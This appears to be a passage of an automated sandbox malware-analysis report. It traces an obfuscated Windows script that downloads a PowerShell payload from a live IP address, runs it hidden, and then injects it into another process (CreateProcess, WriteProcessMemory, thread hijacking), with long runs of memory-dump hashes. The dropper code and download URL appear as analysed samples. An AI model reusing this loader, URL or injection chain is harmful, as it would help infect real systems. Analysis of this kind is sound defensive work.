                                                                                                                                                                                                                                                      • a() ➔ iCoHWQ95euBdJSkIhmoIxSoo,s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU
                                                                                                                                                                                                                                                      • Show all Function Runs
                                                                                                                                                                                                                                                      116
                                                                                                                                                                                                                                                      return q;
                                                                                                                                                                                                                                                        117
                                                                                                                                                                                                                                                        };
                                                                                                                                                                                                                                                          118
                                                                                                                                                                                                                                                          return a ( );
                                                                                                                                                                                                                                                          • a() ➔ iCoHWQ95euBdJSkIhmoIxSoo,s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU
                                                                                                                                                                                                                                                          • Show all Function Runs
                                                                                                                                                                                                                                                          119
                                                                                                                                                                                                                                                          }
                                                                                                                                                                                                                                                            120
                                                                                                                                                                                                                                                            function LogError(d) {
                                                                                                                                                                                                                                                              121
                                                                                                                                                                                                                                                              var o = l;
                                                                                                                                                                                                                                                                122
                                                                                                                                                                                                                                                                WScript[o ( 0x1f5, '6hid' ) ] ( d );
                                                                                                                                                                                                                                                                  123
                                                                                                                                                                                                                                                                  }
                                                                                                                                                                                                                                                                    124
                                                                                                                                                                                                                                                                    function RunPowerShellScript(d) {
                                                                                                                                                                                                                                                                    • RunPowerShellScript("C:\Temp\WTRTRWFSHS.ps1") ➔ undefined
                                                                                                                                                                                                                                                                    125
                                                                                                                                                                                                                                                                    var p = k;
                                                                                                                                                                                                                                                                      126
                                                                                                                                                                                                                                                                      try
                                                                                                                                                                                                                                                                        127
                                                                                                                                                                                                                                                                        {
                                                                                                                                                                                                                                                                          128
                                                                                                                                                                                                                                                                          var f = POWERSHELL_CMD + '\x22' + d + '\x22';
                                                                                                                                                                                                                                                                            129
                                                                                                                                                                                                                                                                            shell[p ( 0x1f6 ) ] ( f, 0x0, ! ! [] );
                                                                                                                                                                                                                                                                            • p(502) ➔ "Run"
                                                                                                                                                                                                                                                                            • Run("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"",0,true) ➔ 0
                                                                                                                                                                                                                                                                            • Show all Function Runs
                                                                                                                                                                                                                                                                            130
                                                                                                                                                                                                                                                                            }
                                                                                                                                                                                                                                                                              131
                                                                                                                                                                                                                                                                              catch ( g )
                                                                                                                                                                                                                                                                                132
                                                                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                                                                  133
                                                                                                                                                                                                                                                                                  LogError ( p ( 0x209 ) + g['message'] );
                                                                                                                                                                                                                                                                                    134
                                                                                                                                                                                                                                                                                    }
                                                                                                                                                                                                                                                                                      135
                                                                                                                                                                                                                                                                                      }
                                                                                                                                                                                                                                                                                        136
                                                                                                                                                                                                                                                                                        DownloadScript ( URL, DownloadPath ) ? RunPowerShellScript ( DownloadPath ) : ( LogError ( 'Exiting\x20script\x20due\x20to\x20download\x20failure.' ), WScript[l ( 0x207, 'uWy)' ) ] ( ) );
                                                                                                                                                                                                                                                                                        • DownloadScript("http://176.65.144.3/dev/devil.ps1","C:\Temp\WTRTRWFSHS.ps1") ➔ true
                                                                                                                                                                                                                                                                                        • RunPowerShellScript("C:\Temp\WTRTRWFSHS.ps1") ➔ undefined

                                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000009.00000002.1370792489.00007FFC3C3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3C3D0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ffc3c3d0000_powershell.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 30f0f16a8a4a2fc5569d4b2a39dbd997b293c7f3dc7e521ee7f59c3b23a3c5ae
                                                                                                                                                                                                                                                                                        • Instruction ID: 6437e8bbeade10966a7310e55d46e01c841f0aab817115dd19fb67e48ca6f5de
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 30f0f16a8a4a2fc5569d4b2a39dbd997b293c7f3dc7e521ee7f59c3b23a3c5ae
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5DE16731A0DB9D4FE799D7285819AF87BE1EF86310B0901FBD049C71A3ED299C45C7A1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000009.00000002.1370792489.00007FFC3C3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3C3D0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ffc3c3d0000_powershell.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: f7383f14f3e087985c71b9ad6dd7385fb1830c4545c96b0cd684efb0fbf2f5ee
                                                                                                                                                                                                                                                                                        • Instruction ID: 8fef3b4b8f2f8ee63761709fca65140846e6d4c92c0ba716eb15b5c0eb8981d4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7383f14f3e087985c71b9ad6dd7385fb1830c4545c96b0cd684efb0fbf2f5ee
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93112B26E0CA3E4BE6ECD218605A9FC22C1EFD4790B450179D50DC3192EE2D6C81E2E1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000009.00000002.1370055801.00007FFC3C300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3C300000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ffc3c300000_powershell.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                                                                        • Instruction ID: adb4e0c4f36993e609ea8e39238dcb8302d1348298458dea11f8070c78382f5c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3601677111CB0D4FD784EF0CE451AA6B7E0FB95364F10056DE58AC3661D636E882CB46

                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                        Execution Coverage

                                                                                                                                                                                                                                                                                        Dynamic/Packed Code Coverage

                                                                                                                                                                                                                                                                                        Signature Coverage

                                                                                                                                                                                                                                                                                        Execution Coverage:19.3%
                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                        Signature Coverage:10.9%
                                                                                                                                                                                                                                                                                        Total number of Nodes:64
                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:3
                                                                                                                                                                                                                                                                                        Show Legend
                                                                                                                                                                                                                                                                                        Hide Nodes/Edges
                                                                                                                                                                                                                                                                                        execution_graph 4271 cf8f7f 4275 cf7b08 4271->4275 4279 cf7b03 4271->4279 4272 cf8fa5 4276 cf7b54 ReadProcessMemory 4275->4276 4278 cf7bcc 4276->4278 4278->4272 4280 cf7b54 ReadProcessMemory 4279->4280 4282 cf7bcc 4280->4282 4282->4272 4250 cf904c 4251 cf8fdc 4250->4251 4252 cf9051 4250->4252 4251->4250 4255 cf79a8 4251->4255 4259 cf79b0 4251->4259 4256 cf79b1 WriteProcessMemory 4255->4256 4258 cf7a95 4256->4258 4258->4251 4260 cf79fc WriteProcessMemory 4259->4260 4262 cf7a95 4260->4262 4262->4251 4283 cf8c39 4287 cf7678 4283->4287 4291 cf7677 4283->4291 4284 cf8c4d 4288 cf76bc ResumeThread 4287->4288 4290 cf7708 4288->4290 4290->4284 4292 cf76bc ResumeThread 4291->4292 4294 cf7708 4292->4294 4294->4284 4295 cf1bd8 4296 cf1c25 VirtualProtect 4295->4296 4297 cf1c91 4296->4297 4267 cf8b24 4269 cf79a8 WriteProcessMemory 4267->4269 4270 cf79b0 WriteProcessMemory 4267->4270 4268 cf8b45 4269->4268 4270->4268 4298 cf8751 4302 cf7889 4298->4302 4306 cf7890 4298->4306 4299 cf8774 4303 cf78d4 VirtualAllocEx 4302->4303 4305 cf794c 4303->4305 4305->4299 4307 cf78d4 VirtualAllocEx 4306->4307 4309 cf794c 4307->4309 4309->4299 4310 cf87b0 4314 cf7768 4310->4314 4318 cf7760 4310->4318 4311 cf87ca 4315 cf77b1 Wow64SetThreadContext 4314->4315 4317 cf7829 4315->4317 4317->4311 4319 cf77b1 Wow64SetThreadContext 4318->4319 4321 cf7829 4319->4321 4321->4311 4322 cf93b0 4324 cf823f 4322->4324 4323 cf9467 4324->4323 4327 cf7d38 4324->4327 4331 cf7d37 4324->4331 4328 cf7dbf CreateProcessA 4327->4328 4330 cf8014 4328->4330 4332 cf7dbf CreateProcessA 4331->4332 4334 cf8014 4332->4334 4335 cf8430 4340 cf7768 Wow64SetThreadContext 4335->4340 4341 cf7760 Wow64SetThreadContext 4335->4341 4336 cf9467 4337 cf823f 4337->4336 4338 cf7d38 CreateProcessA 4337->4338 4339 cf7d37 CreateProcessA 4337->4339 4338->4337 4339->4337 4340->4337 4341->4337

                                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: 0.V$<$@
                                                                                                                                                                                                                                                                                        • API String ID: 0-3650422160
                                                                                                                                                                                                                                                                                        • Opcode ID: 1eae45f22cdd084297ba47ae0ca3a89847bdca951641dd5d7c36c91dd187a239
                                                                                                                                                                                                                                                                                        • Instruction ID: 6207df5b3e2e1b91fd6ecaa905ed23b04929a3a8a9c89fce52a5cffc419952da
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1eae45f22cdd084297ba47ae0ca3a89847bdca951641dd5d7c36c91dd187a239
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3562AF74D0021ACFDB64DFA9CA84B9DFBF2BF88301F1981A9D518AB211D7709A81DF51
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: P$$q$kH
                                                                                                                                                                                                                                                                                        • API String ID: 0-905882517
                                                                                                                                                                                                                                                                                        • Opcode ID: 6d81c884e81f9a508dc7b13cf856ee4c0961f72ab0e7e9e4713702f4bb7e3e7d
                                                                                                                                                                                                                                                                                        • Instruction ID: 5ed4481e1529a38cbfc8708954a44507e7faa6b73e08f3ab7de3ed11a763d486
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6d81c884e81f9a508dc7b13cf856ee4c0961f72ab0e7e9e4713702f4bb7e3e7d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB52F774A01259CFDB64DFA9C984B9EFBB2BF89301F15C195D548AB212C7309E81CF52
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: P$$q$kH
                                                                                                                                                                                                                                                                                        • API String ID: 0-905882517
                                                                                                                                                                                                                                                                                        • Opcode ID: ee0ec0a853d921ac251f7fbf517fcd479281c0896e33b7b71d338b626e18220c
                                                                                                                                                                                                                                                                                        • Instruction ID: 746c20e5ba528bc23cd901452555b42d6b2bef26653d1406f5e0f8a616ad7dda
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee0ec0a853d921ac251f7fbf517fcd479281c0896e33b7b71d338b626e18220c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9B1B574E00219CFEB68CF66C840BAEBBB2BB89300F14C5EA950DA7255DB705E81DF51

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 521 cf83e4-cf83eb 522 cf83ed-cf8402 521->522 523 cf8404-cf840e 521->523 524 cf8418-cf842e 522->524 523->524 525 cf93f2 524->525 526 cf83b0-cf83d5 524->526 529 cf93fc-cf9421 525->529 527 cf83de-cf93f0 526->527 528 cf83d7 526->528 527->525 543 cf9467-cf946e 527->543 531 cf823f 528->531 532 cf82fe-cf833b 528->532 533 cf827d-cf82a4 528->533 534 cf82f8-cf82f9 528->534 535 cf82e7-cf82f3 528->535 536 cf82a6-cf82e2 528->536 537 cf8482-cf8499 528->537 538 cf942a-cf942b 529->538 539 cf9423 529->539 540 cf8249-cf826e 531->540 552 cf8346-cf8388 532->552 533->540 544 cf943d-cf9454 534->544 535->540 536->540 537->526 542 cf942d-cf943b 538->542 538->543 539->525 539->542 539->543 539->544 545 cf8277-cf8278 540->545 546 cf8270 540->546 542->529 544->535 549 cf945a-cf9465 544->549 545->532 545->533 546->531 546->532 546->533 546->534 546->535 546->536 549->529 554 cf838b call cf7d38 552->554 555 cf838b call cf7d37 552->555 553 cf838d-cf83a6 553->526 554->553 555->553
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: zsU$zsU
                                                                                                                                                                                                                                                                                        • API String ID: 0-2047252256
                                                                                                                                                                                                                                                                                        • Opcode ID: 68c10a4575dfae0b054d14e41f1f12f4cfedd1fb0546fefa8cbf5cc3dcb27a2f
                                                                                                                                                                                                                                                                                        • Instruction ID: 52149be6f7e71ec908a12dfb6cc00abe181930207d154dfed59ccd08169d74f3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68c10a4575dfae0b054d14e41f1f12f4cfedd1fb0546fefa8cbf5cc3dcb27a2f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14511870D40229DBDBA4CF55D880BEDBBB2EB99310F10C5EAD10AB7250DB709AC58F55
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: $q
                                                                                                                                                                                                                                                                                        • API String ID: 0-1301096350
                                                                                                                                                                                                                                                                                        • Opcode ID: 560e059adb88d15d546c6c74848994920fe1ef257f49af3309020ac8b3cbdfe0
                                                                                                                                                                                                                                                                                        • Instruction ID: e24b432eca66a04a80ce561b43b1cf686d7f33b10162da21f04ed942fb84c92c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 560e059adb88d15d546c6c74848994920fe1ef257f49af3309020ac8b3cbdfe0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 94610874E0130CDFDB58CFA5C881AAEBBB2FF89300F24846AD505AB264DB359952DF51
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: $q
                                                                                                                                                                                                                                                                                        • API String ID: 0-1301096350
                                                                                                                                                                                                                                                                                        • Opcode ID: 1015bd2512d5207aa8bcbeb55f98f31ec9d282a9389e670ae2204b9edcdfa57d
                                                                                                                                                                                                                                                                                        • Instruction ID: ae077edfa39a2fe9857198a4ccea37cb72e6f81a7eb2edcba311363571de6dc6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1015bd2512d5207aa8bcbeb55f98f31ec9d282a9389e670ae2204b9edcdfa57d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74611774E0020CDFDB58CFA5C980AAEBBB2FF88300F248469D505AB364DB359952DF55
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: e2b5fb93d6456bdcb21325f6166561bc92a4ad9cc5821d82cfa8d14f39ad6706
                                                                                                                                                                                                                                                                                        • Instruction ID: 2a438305dcb8ec7ce35f5940c4c64cf64ec07616d95ef560e1f134098c964554
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e2b5fb93d6456bdcb21325f6166561bc92a4ad9cc5821d82cfa8d14f39ad6706
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B427F74E01229CFDB64CFA9C984BADBBB2BF48310F5481A9D909A7355D730AE81CF51
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 70c1cc91a6bfc7404b40a0f41ddde1741a5ad8bc295979daaece4a6c6f127cc9
                                                                                                                                                                                                                                                                                        • Instruction ID: cec832eff2a106e237ee903e9ac2fbcd146bad06549c57b9f1d130bba04c6163
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 70c1cc91a6bfc7404b40a0f41ddde1741a5ad8bc295979daaece4a6c6f127cc9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C713A71E006298BDB68CF66D8407EDFBB2EB89300F14C5AA950DA7250EB305A85CF05
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: c847012944743a2379efdda24a1d4e08391747730d0b12e8c0f2af711f971463
                                                                                                                                                                                                                                                                                        • Instruction ID: 5446300bffb095ca6d15ce1f29906616e0922abec1597ac431bb9efe0fa4b58a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c847012944743a2379efdda24a1d4e08391747730d0b12e8c0f2af711f971463
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F712871E006699BDB68CF66D8447EDBBB2EF89300F14C5AAD50DB7264EB305A85CF04
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 5652e4ad21295ff07da79eac84b651f539b555f42f8abdffb0be8f352b78d151
                                                                                                                                                                                                                                                                                        • Instruction ID: 4244330670d8013a30b10141a4b2c580319b276e840e004f421e07ce7c877d96
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5652e4ad21295ff07da79eac84b651f539b555f42f8abdffb0be8f352b78d151
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF61B475E01618CFDB18CFAAC984B9DBBB2BF88300F14C1AAD809A7364D7359A41CF50
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: cdf9ba29df8eff4a2f84c19050b94a50bb90babafccd2b69396ef0343e380347
                                                                                                                                                                                                                                                                                        • Instruction ID: e6ad43a2d6b0fed8d49adab9f973494800ba13b1d2fa166426ec186fabcf8f8f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cdf9ba29df8eff4a2f84c19050b94a50bb90babafccd2b69396ef0343e380347
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E511875901229DFDB64CF65D880BEDBBB2EB89310F1485EAD10EA7250EB309A85CF54
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 53c4d5aa8eec3d718c9884ed56b83fcb36fc590ecfb3ed2b90052e5df2eda6ed
                                                                                                                                                                                                                                                                                        • Instruction ID: efd14d64481c4582a930e965b41f047341df9e55140d65f01246495b32af87a1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 53c4d5aa8eec3d718c9884ed56b83fcb36fc590ecfb3ed2b90052e5df2eda6ed
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65514970D0920DDFDB45DFA6C5446EEBBB2BF89300F20956AC512BB250CB399A02CF56
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 69a528543d22483f8868b67e8078e7bd7a5b5a95908e0e1104ba3dea07670a45
